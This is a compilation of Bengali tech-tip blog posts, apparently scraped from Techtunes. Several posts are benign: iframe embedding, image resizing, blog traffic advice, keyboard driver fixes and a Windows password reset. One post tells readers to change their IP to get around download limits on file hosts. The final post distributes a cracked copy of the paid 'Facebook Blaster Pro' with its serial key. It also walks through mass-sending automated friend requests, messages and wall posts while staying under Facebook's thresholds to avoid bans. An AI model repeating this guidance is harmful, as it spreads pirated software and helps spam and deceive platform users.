বি.দ্রঃ আপনার কাছে প্রতিনিয়ত অনেক বেশি ইমেইল আসলে এ পদ্ধতিতে আপনার উৎসাহ না থাকাই ভাল। নাহলে এসএমএস আসতে আসতে আপনার জীবন অতিষ্ট হয়ে যাবে আর মনে মনে আমাকে বকবেন।

চলুন দেখি I frame কেরামতি

চলুন দেখি I frame কেরামতি।আমি অনেক দিন ধরে এই কোড টি খুজছিলাম অবশেষে পেয়ে গেলাম সেই কোডটি।আমার কাছে জিনিষটা মজা লাগল তাই আপনাদের সাথে শেয়ার করলাম।হয়ত আগে আপনারা অনেকে জেনে থাকবেন I frame সর্ম্পকে।আসলে এই কোড দিয়া আপনার ব্লগ/ওয়েব সাইটে অন্য আরেক সাইট প্রদর্শন করতে পারবেন।ডেমো দেখুন……………

:: কালের কন্ঠ ::

আপনার ব্লগ/ওয়েব সাইটের যে স্থানে অন্য ওয়েব সাইট প্রদর্শন করতে চান সেই খানে শুধু এই কোডটি দিন এবং যে সাইটি প্রদর্শন করবেন সেই সাইটের height=”…..” width=”…..‍‌‌” ঠিক করে নিন তাহলে সাইট টি ভাল করে দেখতে পারবেন।

<center> <iframe name="Blogger" src="http://www.a2zbd.info/" frameborder="0" scrolling="auto" height="3000" width="1000"> <href="http://www.a2zbd.info/"></a> </iframe> </center>

এখন খুব সহজে Image Resizer দিয়ে ছবি ছোট করুন । (মিনি টিউন)

আসসালামু আলাইকুম ।
আমাদের বিভিন্ন কাজের জন্য ছবির আকার বড় এবং ছোট করতে হয় ।
এ জন্য Photoshop বা অন্ন কোন প্রোগ্রাম দিয়ে আমরা ছবির সাইজ এবং ধরন বদলে থাকি ।
Image Resizer সফটওয়্যারটি মাইক্রোসফট কম্পানির Object প্রোগ্রাম ।
এই সফটওয়্যারটি ইন্সটল করার পর আপনি যে ছবিটির আকার বা সাইজ পরিবরতন করবেন, সেই ছবিটির উপর রাইট বাটন ক্লিক করে Resize Pictures নামে একটি আপসন পাবেন ।
এটার উপর ক্লিক করার সাথে সাথে নিচের আকারে একটি প্রগ্রাম আসবে । এখন আপনার ইচ্ছে অনুজ়ায়ি ছবির ধরন পালটে নিতে পারবেন ।
capture1 এখন খুব সহজে Image Resizer দিয়ে ছবি ছোট করুন । (মিনি টিউন) | Techtunes
সফটওয়্যারটি ডাউনলোড করার জন্য এখানে ক্লিক করেন

ব্লগে হাই ট্রাফিক পাবার ১০টি প্রধান উপায়

যেকোন সাইট বা ব্লগের প্রাণ হচ্ছে ব্লগের পাঠকরা । যে ব্লগে বেশী পাঠক বা ট্রাফিক সেই ব্লগ তত সমৃদ্ধ । যদি পাঠক পোষ্ট নাই পড়ে সেই ব্লগে লিখে লাভ কি ? তবে প্রাইভেট ডায়েরী হিসেবে ব্লগ লিখলে তা এই হিসেবে না ফেললেও হবে । আর জানেনই তো সাইট বা ব্লগের সেই মহাসূত্র “ট্রাফিক==টাকা” । এই ট্রাফিক পাওয়াই যত ঝামেলার কাজ । তা না হলে এতো দিনে সবাই বিল গেটস হয়ে যেতো icon wink ব্লগে হাই ট্রাফিক পাবার ১০টি প্রধান উপায় | Techtunes । এই পোষ্টে চেষ্টা করা হয়েছে ব্লগে বা সাইটে ট্রাফিক পাওয়ার বেসিক কিছু উপায় আলোচনা করতে ।
imgtraffic ব্লগে হাই ট্রাফিক পাবার ১০টি প্রধান উপায় | Techtunes

১# সার্চ ইন্জিন

পৃথিবীর প্রতিষ্ঠিত তাবৎ ব্লগগুলোর সিংহভাগ ট্রাফিক আসে সার্চ ইন্জিন, আরো নির্দিষ্টভাবে বললে গুগল থেকে । প্রতি মূহূর্তে কোটি কোটি মানুষ তথ্য খুজছে সার্চ ইন্জিনগুলোয় । সেই টাফিকের সিকে ভাগও যেকোন ব্লগের জন্য অনেক বড় পাওয়া ।
এই সার্চ ইন্জিন ট্রাফিক পেতে আপনার ব্লগকে এমনভাবে সাজাতে হবে যেনো সার্চ ইন্জিন বটগুলোর সুনজরে পরেন । meta tag, keyword সঠিকভাবে কাজে লাগাতে হবে । এর জন্য ওয়ার্ডপ্রেস ব্যবহারকারীরা All in one SEO প্লাগইনটি ব্যবহার করতে পারেন । লেখতে হবে এমন বিষয়ে যা অন্য ব্লগগুলোয় নাই (এর জন্য কোন প্লাগইন নাই, নিজেই লিখতে হবে icon biggrin ব্লগে হাই ট্রাফিক পাবার ১০টি প্রধান উপায় | Techtunes ) । তৈরী করতে হবে বেশী বেশী ব্যাকলিংক যাতে পেজরেন্ক বাড়ে ।

২# সোসিয়্যাল নেটওয়ার্কিং

বর্তমানে সোসিয়্যাল ট্রাফিকের পরিমান অত্যাধিক বেড়ে গিয়েছে । অনেক ক্ষেত্রে এটি সার্চইন্জিন থেকেও বেশী ট্রাফিক দেয় । ফেসবুকে আছে ৫০০+ মিলিয়ন, টুইটারে ১৫০+ মিলিয়ন ব্যবহারকারী । এই বিরাট ট্রাফিককে নিয়ে যেতে হবে নিজ ব্লগে । যার ফ্রেন্ড বা ফ্যান তালিকা যত বড় তার প্রাধান্যও তত বেশী ।
এর জন্য নিজ ব্লগের ফেসবুক পেজ ও টুইটার একাউন্ট তৈরী করে ব্লগের মাধ্যমে সবাইকে জানিয়ে দিন সেগুলোর ঠিকানা । ব্লগের ফিড সংযুক্ত করে দিন সেগুলোতে । পেজ লাইক করতে বন্ধুদের রিকোয়েস্ট পাঠাতে পারেন । তবে এটি যেন কারো বিরক্তি কারণ না হয় সেটিও খেয়াল রাখবেন ।

৩# ভাল কন্টেন্ট লিখুন

ভালো কনটেন্টের কোন বিকল্প নেই । ইংরেজীতে একটা কথা প্রচলিত আছে “Content is the king” । আপনি যত যাই করেন না কেন, পাঠক ভালো কন্টেন্ট না পেলে এক মূহূর্তও থাকবে আপনার সাইটে । আর যদি মান সম্মত পোষ্ট লিখেন দেখবেন পাঠক নিজেই খুজে নিবে আপনাকে ।

৪# ব্লগ কমেন্টিং

আপনার ব্লগে ট্রাফিক পাবার অন্যতম পথ হতে পারে অন্যান্য ব্লগে কমেন্টিং । এটি আপনার ব্যাকলিংক বৃদ্ধিতেও দারুন কাজে দিবে । যে সব ব্লগে commentluv, dofollow করা আছে সেগুলোকে প্রাধান্য দিন । তবে স্পামিং কখনোই করবেন না পোষ্ট পড়ে গঠনমূলক মন্তব্য দিবেন ।

৫# গেস্ট ব্লগিং

একই টপিকের বা একই ধরণের জনপ্রিয় ব্লগগুলোতে ব্লগ লিখে পেতে পারেন ভালো পরিমানের ট্রাফিক । এখন বেশীরভাগ ব্লগগুলোয় গেস্ট ব্লগিং স্বাগত জানানো হয় । ভালো মানের লেখা লিখে জমা দিতে পারেন সেগুলোতে । তবে একই ব্লগে বারবার পোষ্ট দিবেন না, নিজের লেখাকে ছড়িয়ে দিন চারদিকে ।

৬# Delicious এবং Stumbleupon

এই দুটি সোসিয়্যাল লিংক শেয়ারিং সাইট ভীষন জনপ্রিয় । নিজ ব্লগের নামে একাউন্ট খুলে প্রতি পোষ্টের লিংক শেয়ার করুন । সাইটে/ব্লগে শেয়ারিং বাটান রাখুন ।

৭# ডাইরেক্টরী সাবমিশন

ব্লগ ডাইেক্টরী গুলোর জনপ্রিয়তা কমে গেলেও একেবারে শেষ হয়ে যায় নাই। ভাল মানের ব্লগ ডাইেক্টরী খুজে ছড়িয়ে দিন নিজ লিংক ।

৮# কমিউনিটি গড়ুন

সমমনা ব্লগারদের সাথে বন্ধুত্বপূর্ণ সম্পর্ক তৈরী করুন । একে অপরের ব্লগের ব্যানার নিজ নিজ সাইটে শেয়ার করুন । এটি উভয়ের জন্যই মঙ্গলময় হবে ।

৯# পিং করুন

ব্লগের ইউআরএল পিং করুন সার্চ ইন্জিন ও ব্লগ ডাইরেক্টরীগুলোতে । এই ক্ষেত্রে সবচেয়ে জনপ্রিয় ওয়ার্ডপ্রেসের সিস্টার কনসার্ন ping-o-matic । সাইটটিতে যেয়ে ব্লগের ইউআরএল, নাম লিখে দিলেই হয়ে যাবে পিংগিং ।

১০# ভিডিও শেয়ারিং সাইটগুলো

YouTube বা Viemo এর মত সাইট থেকেও অনেকে প্রচুর পরিমানে ট্রাফিক পাচ্ছেন । ব্লগ টপিকের সাথে মিল রেখে ভিডিও তৈরী করে ছেড়ে দিন ভিডিও শেয়ারিং সাইটগুলোতে । সাথে যোগ করে দিন নিজ ব্লগের লিংক ।
মোট কথা সাইটের ট্রাফিক পাবার কোন গোপন রহস্য নেই । একটু পরিশ্রম আর বুদ্ধির মিশেল দিলেই মিলবে হাই ট্রাফিকের সন্ধান ।

কীবোর্ড বা এর কোন কী নষ্ট হলে করনীয়।

সকল প্রসংশা আল্লাহর, যিনি আমাদের সৃষ্টি করেছেন।
কীবোর্ড ছাড়া আপনার কম্পিউটারের কোন  অস্তিত্ত আছে? না নেই, অন্তত আমরা যারা ব্লগিং করি অন্তত তাদের কাছে নেই। এখন এই কীবোর্ড বা এর দু একটি কী যদি নষ্ট হয় তাহলে কেমন লাগে বলুন? হার্ডওয়ার সমস্যা না থাকলে অর্থাৎ আপনার অপারেটিং সিস্টেমে সমস্যা থাকলে আপনি এটা ঠিক করতে পারেন খুব সহজে।
তার জন্য
:::Start Menu:::>Control Panel:::>Printers and others Hardware:::>Keyboard  এ যান
screenshot2 কীবোর্ড বা এর কোন কী নষ্ট হলে করনীয়।   | Techtunes
এবং Hard ware সিলেক্ট করুন। এবার আপনার কীবোর্ড নির্বাচন করে Properties এ ক্লিক করুন।
Uninstall কীবোর্ড বা এর কোন কী নষ্ট হলে করনীয়।   | Techtunes
এখান থেকে Driver সিলেক্ট করুন। এবং শেষে আপনার কীবোর্ডটি Uninstall করুন। এবার আপনার কম্পিউটার রিস্টার্ট দিন। অটমেটিক ভাবে কিবোর্ড ড্রাইভাএ ইন্সটল হবে।
অথবা আপনি My Computer এ Right click করে Manage এ ক্লিক করুন। এখান থেকে Device Manager এ ক্লিক করুন। ডান পাশ থেকে Key Board  এ ডাবল ক্লিক করুন। তারপর আপনার কীবোর্ড সিলেক্ট করে Uninstall চিহ্নে অথবা Action::>> Uninstall  এ ক্লিক করে Uninstall করুন।
keyboard propertice কীবোর্ড বা এর কোন কী নষ্ট হলে করনীয়।   | Techtunes
এবার কম্পিউটার রি-স্টার্ট দিন। এবার দেখুন হয়েছে কিনা। যদি ঠিক না হয় আপনার কীবোর্ড টি অন্য কম্পিউটারে লাগিয়ে দেখুন কী গুলো কাজ করে কিনা। যদি না করে তাহলে এবার অন্য ব্যবস্থা।
কীবোর্ড রীম্যাপিং।
এ পদ্ধতি দিয়ে আপনি একটি কী এর কাজ অন্য এক বা একাধিক কী দিয়ে সারিয়ে নিতে পারবেন।  যদি একটি বা দুটি কীতে সমস্যা থাকে তাহলে নিচের টিউন থেকে যেনে নিতে পারেন।
আপনার অচল (নষ্ট) কীবোর্ড সচল (ভালো) করুন

কম্পিউটারের পাসওয়ার্ড হারিয়ে ফেললে করনীয়

পাসওয়ার্ড হারিয়ে গেলে আপনারা অনেক ভাবেই ফেললে কম্পিউটারে ঢুকতে পারেন। আজ অন্য ভাবে দেখুন পারেন কিনা।
বিদ্রঃ এটি সম্ভব হবে যদি এডমিনিস্ট্রেশনে কোন পাসওয়ার্ড নেই বা এডমিনিস্ট্রেশনের পাসওয়ার্ড আপনার জানা।
আপনার কম্পিউটারের ইউজার পাসওয়ার্ড হারিয়ে পেললে পুনরায় ইউজার এ ঢুকতে প্রথমে আপনাকে এডমিনিস্ট্রেশনে  ঢুকতে হবে। এডমিনিস্ট্রেশনে ঢুকতে লগ-অন স্ক্রিন আসলে Ctrl+Alt+Delete কী একসাথে চাপুন। তাহলে এডমিনিস্ট্রেশন একাউন্ট আসবে। এবার এডমিনিস্ট্রেশন ঢুকে Start Menu তে ক্লিক করে Run এ যান এবং
“control userpasswords2” লিখে ওকে করুন।
Reset passwoard কম্পিউটারের পাসওয়ার্ড হারিয়ে ফেললে করনীয়   | Techtunes
এবার যে একাউন্টের পাসওয়ার্ড ভুলে গেছেন তা সিলেক্ট করে Reset Password এ ক্লিক করুন। তাহলে আপনার ইউজার একাউন্টের পাসওয়ার্ড রিমুব হয়ে যাবে। আপনি ও আপনার একাউন্টে ঢুকতে পারবেন।
সবার জন্য একটা টিপস, যাদের Administrator এ পাসওয়ার্ড দেওয়া আছে, তা যদি ভুলে গিয়ে থাকেন এখান থেকে তা রিমুভ করে দিয়ে নতুন মনে রাখা যায় এমন পাসওয়ার্ড দিন। তাহলে ভবিশ্যতে পাসওয়ার্ড হারিয়ে গেলে কোন সমস্যা থাকবে না। আর কারো কম্পিউটারে Administrator নামে কোন একাউন্ট না থাকে তাহলে একাউন্ট একটা খুলে রেখে দিন, পরে কাজে লাগতে পারে।
একটা সর্টকাটঃ Start Menu তে ক্লিক করে Run এ গিয়ে এবং “control userpasswords” লিখে ওকে করলে আপনার Control panel এর User Account আসবে। অন্যান্য পরিবর্তন এখান থেকে করুন।
ধন্যবাদ সবাইকে।

MegaVideo | MegaUpload | HotFile |FileServe | Youtube লিংক জেনারেটর ১০০% কাযর্কর (চিত্রসহ আপডেটেড)।

এটি আমার জীবনের প্রথম টিউন। কোন ভুল হলে মাফ করে দিবেন। আজ বহুদিন ধরে আমি টেকটিউনসে আছি কিন্তু ভয়ে টিউন করি না। আজ সাহস নিয়ে করে ফেললাম।
এবার কাজের কথা বলি
আগে এরকম অনেক টিউন হয়েছে। কেউ এই সাইট টি নিয়ে টিউন করেনি। আমি অনেকদিন ধরে এই লিংক জেনারেটর টি ব্যবহার করছি চাইলে আপনারাও করতে পারেন। এখানে
MegaVideo | MegaUpload | HotFile |FileServe | Youtube
এর লিংক জেনারেট করে ডাউনেলাড করতে পারবেন। unlimited resume সাপোর্ট পাবেন। একটি আইপি থেকে ৪ টি লিংক জেনারেট করতে পারবেন। তারপর আইপি চেঞ্জ করে নিন আবার ৪ টি আর জিপি গ্রাহকরা আইপি চেঞ্জ করতে একবার ইন্টারনেট ডিসকানেক্ট করে আবার কানেক্ট করুন ব্যাস এভাবে যত খুশিডাউনলোড করুন।
11 MegaVideo | MegaUpload | HotFile |FileServe | Youtube লিংক জেনারেটর ১০০% কাযর্কর (চিত্রসহ আপডেটেড)। | Techtunes
2 MegaVideo | MegaUpload | HotFile |FileServe | Youtube লিংক জেনারেটর ১০০% কাযর্কর (চিত্রসহ আপডেটেড)। | Techtunes3 MegaVideo | MegaUpload | HotFile |FileServe | Youtube লিংক জেনারেটর ১০০% কাযর্কর (চিত্রসহ আপডেটেড)। | Techtunes
সাইট টিতে প্রবেশ করতে

এখানে ক্লিক করুন।

কোন সমস্যা হলে জানাবেন

যেভাবে মাত্র ১ ক্লিকেই ফেসবুকে পাঠাবেন হাজার হাজার অটোমেটিক ফ্রেন্ড রিকুয়েস্ট,ওয়াল পোষ্ট,মেসেজ ও পকে।

সবাইকে অনেক অনেক ভালবাসা জানিয়ে শুরু করছি আমার ২০১১ সালের প্রথম টিউনটি।আমার আজকের এই টিউনটি বিষয় হলো কিভাবে অতি অল্প সময়ে আপনি ফেসবুকে হাজার হাজার অটোমেটিক ফ্রেন্ড রিকুয়েস্ট,ওয়াল পোষ্ট,মেসেজ ও পকে পাঠাবেন।তো আর সময় নষ্ট না করে চলুন দেখে নেয়া যাক আমার ২০১১ সালের প্রথম টিউনটি।

ডাউনলোড করুন Facebook Blaster Pro

আপনি অটোমেটিক ভাবে ফ্রেন্ড রিকুয়েস্ট,ওয়াল পোষ্ট,মেসেজ ও পকে পাঠাতে চাইলে আপনাকে ব্যবহার করতে হবে Facebook Blaster Pro নামের একটি সটওয়্যার।দাম মাত্র $৫০ ডলার!
facebook+blaster যেভাবে মাত্র ১ ক্লিকেই ফেসবুকে পাঠাবেন হাজার হাজার অটোমেটিক ফ্রেন্ড রিকুয়েস্ট,ওয়াল পোষ্ট,মেসেজ ও পকে। | Techtunes
আরে নাহ ঘাবড়ানোর কিছু নাই।আমি আপনাদেরকে এই সফটওয়্যারটাই দেব সম্পূর্ণ ফ্রীতে।আর সফটওয়্যারটি ফ্রীতে ডাউনলোডের জন্য চলে যান এই লিংকে
এবার সফটওয়্যারটি ডাউনলোড করুন।ডাউনলোড করা হয়ে গেলে আনজিপ করুন।এবার সফটওয়ারটি ইনস্টাল করুন এবং সাথে থাকা TXT ফাইল থেকে Facebook Blaster Pro এর সিরিয়াল কী দিয়ে এক্টিভ করে নিন।আর মওকুফ পান ৫০ ডলার।

এবার আসি প্রধান কাজে

ডাউনলোড তো হয়ে গেলে।প্রিমিয়াম সফটওয়্যার ও রেডি।এবার কাজের পালা।
প্রথমে Facebook Blaster Pro চালু করুন।এখানে আপনি সফটওয়্যরের ২টি অংশ দেখতে পাবেন।
 যেভাবে মাত্র ১ ক্লিকেই ফেসবুকে পাঠাবেন হাজার হাজার অটোমেটিক ফ্রেন্ড রিকুয়েস্ট,ওয়াল পোষ্ট,মেসেজ ও পকে। | Techtunes
বামে যে অংশটি রয়েছে সেটি হল সফটওয়্যারের আর ডান দিকেরটি হলো ব্রাউজার।আপনাকে ২দিকেই কাজ করতে হবে।
এবার আপনি আপনার ফেসবুকের লগইন ইমেল ও পাসওয়ার্ড দিয়ে Login বাটনে ক্লিক করুন।
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRd-ynxVmUoUol1ppRwpoSiHJ5kzAm3sXNVJr88b6IyO5CmD3CFLahyOASWKJPx2cuh5rXQQ2x_WryL8FRJ0VrVkJ9-cPzQtwK_WHOcbL5X5cIOOCPC8bk982HaFhiU9sTHTzPv8Sj9H52/s640/FaceBook%20Blaster%20pro%201.JPG
আর বারবার লগইন করা থেকে মুক্তি পেতে Save New বাটনে ক্লিক করে আপনার ডাটা সংরক্ষণ করে রাখতে পারবেন।
লগইন হয়ে গেল।এবার আপনি যদি ফ্রেন্ড রিকুয়েস্ট পাঠাতে চান তাহলে ব্রাউজার থেকে যেকোন নাম লিখে সার্চ করুন।এবার যে পেজ আসবে তার একদম নিচে থেকে
 যেভাবে মাত্র ১ ক্লিকেই ফেসবুকে পাঠাবেন হাজার হাজার অটোমেটিক ফ্রেন্ড রিকুয়েস্ট,ওয়াল পোষ্ট,মেসেজ ও পকে। | Techtunes
see more resultএ ক্লিক করে আপনি আরো অনেক ফ্রেন্ডের লিস্ট আনতে পারেন।আপনার ফ্রেন্ড রিকুয়েস্টের পেজ ওকে।
এবার আপনি বায়ের দিক থেকে “Gather ID” ট্যাবে ক্লিক করুন।ওখানে থেকে Gather ID তে ক্লিক করুন।দেখবেন বাম পাশে ঐ পেজে থাকা সকল ফ্রেন্ডের একাউন্টের আইডি চলে এসেছে।
 যেভাবে মাত্র ১ ক্লিকেই ফেসবুকে পাঠাবেন হাজার হাজার অটোমেটিক ফ্রেন্ড রিকুয়েস্ট,ওয়াল পোষ্ট,মেসেজ ও পকে। | Techtunes
এবার Import List ID To থেকে Friend Request মেনু সিলেক্ট করে Import বাটনে ক্লিক করুন।
এবার Friend Request অপশন আসবে।এখানে যে বক্স আছে সেখানে আপনি যদি রিকুয়েস্টের সাথে কোন মেসজ পাঠাতে চান তাহলে তা লিখুন।
 যেভাবে মাত্র ১ ক্লিকেই ফেসবুকে পাঠাবেন হাজার হাজার অটোমেটিক ফ্রেন্ড রিকুয়েস্ট,ওয়াল পোষ্ট,মেসেজ ও পকে। | Techtunes
আর এই লেখার যেকোন স্থানে যদি আপনি $$NAME$$ ভ্যালুটি টাইপ করেন তাহলে মেসেজ এ অটোমেটিক ভাবে ইউজারের নামটি ইনপুট হবে।এবার আপনি “start” বাটনে ক্লিক করুন।
ব্যস আপনার কাজ শেষ।এবার কেবল অপেক্ষার পালা।সফটওয়্যারটি অটোমেটিক ভাবে সবগুলো আইডিতেই আপনার হয়ে ফ্রেন্ড রিকুয়েস্ট পাঠিয়ে দেবে।
আপনি একইভাবে ওয়াল পোস্ট ও মেসেজ পাঠাতে পারেন।আপনি যদি আপনার নিজের ফ্রেন্ডদের মেসেজ বা ওয়াল পোষ্ট করতে চান তাহলে “Gather ID” ট্যাব থেকে “My Friends” ক্লিক করুন।
 যেভাবে মাত্র ১ ক্লিকেই ফেসবুকে পাঠাবেন হাজার হাজার অটোমেটিক ফ্রেন্ড রিকুয়েস্ট,ওয়াল পোষ্ট,মেসেজ ও পকে। | Techtunes
তাহলে আপনি আপনার ফ্রেন্ডের লিস্টের পেজ এ চলে যাবেন।এবার আগের মত করে Gather ID করুন আর Import List ID To থেকে পছন্দ মত Friend Request,Messanger, বা Wall post সিলেক্ট করে মাত্র ১ ক্লিকেই তা সবার কাছে পাঠিয়ে দিন।

আরো ফ্রী হিসাবে পাচ্ছেন কিছু জটিল টিপস

১।ফেসবুকে একদিনে ২৫০ জনের বেশি ফ্রেন্ড রিকুয়েস্টা পাঠানো যায় না।সম্ভব হলে ২০০ এর বেশি একদিনে পাঠাবেন না।এতে করে একাউন্ট ব্যান হবার কোন আশংকা আর থাকবে না।
২।আপনার যদি ৫০০ ফ্রেন্ড থাকে তাহলে কিন্তু আপনার ফ্রেন্ড লিস্টের পেজে প্রথমে প্রথম ৫০ জনের লিস্ট আসবে।আপনি যদি সবাইকে একসাথে মেসেজ বা ওয়াল পোসট পাঠাতে চান তাহলে আপনি পেজের নিচের দিকে এসে see more result এ ক্লিক করে
 যেভাবে মাত্র ১ ক্লিকেই ফেসবুকে পাঠাবেন হাজার হাজার অটোমেটিক ফ্রেন্ড রিকুয়েস্ট,ওয়াল পোষ্ট,মেসেজ ও পকে। | Techtunes
সবগুলো ফ্রেন্ডের লিস্ট নিয়ে আনুন।তার পর “Gather ID তে ক্লিক করুন।
৩।দ্রুত করে ফ্রেন্ড রিকুয়েস্ট,ওয়াল পোষ্ট,মেসেজ ও পকে পাঠানোর জন্য নিচের পদ্ধতি অনুসরন করতে পারেন
প্রথমে Setting ট্যাব এ যান।এবার নিচের দেখানো স্ক্রীণ শটের মত করে সব কিছু ইনপুট করুন।আর কিছুই করা লাগবে না।
 যেভাবে মাত্র ১ ক্লিকেই ফেসবুকে পাঠাবেন হাজার হাজার অটোমেটিক ফ্রেন্ড রিকুয়েস্ট,ওয়াল পোষ্ট,মেসেজ ও পকে। | Techtunes
৪।আপনার নেট স্পীড যদি কম হয় কিংবা আপনি যদি লিমিটেড ইন্টারনেট ইউস করে থাকেন তাহলে এই টিপসটি অনুসরন করুন।
আপনার ইন্টারনেট এক্সপ্লোরার ব্রাউজার ওপেন করে এর “Tools &gt
; Internet Option মেনুতে যান।Internet Option” মেনু ওপেন হবার পর Advance ট্যাবে যান।
এবার এখান থেকে Multimedia তে যেসব টিক দেয়া আছে তার সবগুলো টিক আনচেক করুন।
 যেভাবে মাত্র ১ ক্লিকেই ফেসবুকে পাঠাবেন হাজার হাজার অটোমেটিক ফ্রেন্ড রিকুয়েস্ট,ওয়াল পোষ্ট,মেসেজ ও পকে। | Techtunes
Apply ও Ok করে বের হয়ে আসুন।এতে করে ব্রাউজিং করার সময় কোন ইমেজ লোড হবে না।ফলে একদিক থেকে যেমন পেজ দ্রুত লোড হবে অন্য দিক থেকে আপনার ইন্টারনেটের ব্যান্ডউইথের ব্যবহার ও কমবে।